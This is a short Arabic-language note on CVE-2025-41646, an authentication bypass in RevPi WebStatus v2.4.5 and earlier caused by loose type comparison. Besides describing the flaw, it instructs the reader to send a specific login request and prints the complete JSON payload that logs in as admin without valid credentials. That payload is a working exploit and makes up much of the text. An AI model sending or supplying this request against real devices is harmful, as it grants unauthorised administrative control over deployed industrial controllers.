
CVE-2025-41646 - تجاوز مصادقة حرج
CVE-2025-41646 - تجاوز المصادقة الحرج
ثغرة حرجة لتجاوز المصادقة (CVE-2025-41646) في RevPi WebStatus الإصدار v2.4.5 وما دون تسمح للمهاجم بتسجيل الدخول كـ admin دون بيانات اعتماد صالحة بسبب ضعف منطق المقارنة بين الأنواع (استخدام == بدلاً من ===).
أرسل طلب تسجيل الدخول التالي:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}